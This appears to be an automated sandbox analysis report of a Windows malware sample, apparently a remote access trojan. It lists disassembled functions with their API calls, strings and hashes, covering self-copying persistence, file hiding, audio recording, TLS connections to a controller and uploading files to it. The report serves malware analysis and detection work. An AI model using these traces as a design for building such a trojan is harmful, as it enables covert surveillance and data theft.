                                                                                                                                                • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                                                                                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                                                                                Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                                                • API String ID: 2649220323-436679193
                                                                                                                                                • Opcode ID: 644260e79740abdb38bbef940962979a92695f68f317ec5f9d18976e4df820c3
                                                                                                                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                                                                • Opcode Fuzzy Hash: 644260e79740abdb38bbef940962979a92695f68f317ec5f9d18976e4df820c3
                                                                                                                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                                                Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                                • API String ID: 738084811-2094122233
                                                                                                                                                • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                                                                                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                                                • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                                                                                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Write$Create
                                                                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                • API String ID: 1602526932-4212202414
                                                                                                                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                                Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000001,00407688,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                • API String ID: 1646373207-3588775462
                                                                                                                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                                                Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\LdSbZG1iH6.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                                                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\LdSbZG1iH6.exe,00000000,00000000), ref: 0040CFBF
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                • String ID: 6$C:\Users\user\Desktop\LdSbZG1iH6.exe$del$open
                                                                                                                                                • API String ID: 1579085052-2969623517
                                                                                                                                                • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                                                                                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                                                • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                                                                                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                                                Function 00414DC1 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                • API String ID: 2490988753-3346362794
                                                                                                                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                                                                                Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3899193279-0
                                                                                                                                                • Opcode ID: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                                                                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                                • Opcode Fuzzy Hash: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                                                                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                                Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                                                • API String ID: 1223786279-2576077980
                                                                                                                                                • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                                                                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                                                                • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                                                                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                                                                                                Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                • String ID: Close
                                                                                                                                                • API String ID: 1657328048-3535843008
                                                                                                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                                                Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$Info
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                                                                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                                                                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                                • API String ID: 3086580692-2582957567
                                                                                                                                                • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                                                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                                • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                                                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                                Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                • API String ID: 3795512280-1152054767
                                                                                                                                                • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                                                                                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                                • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                                                                                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                                                                                Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                • API String ID: 994465650-3229884001
                                                                                                                                                • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                                                                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                                • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                                                                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
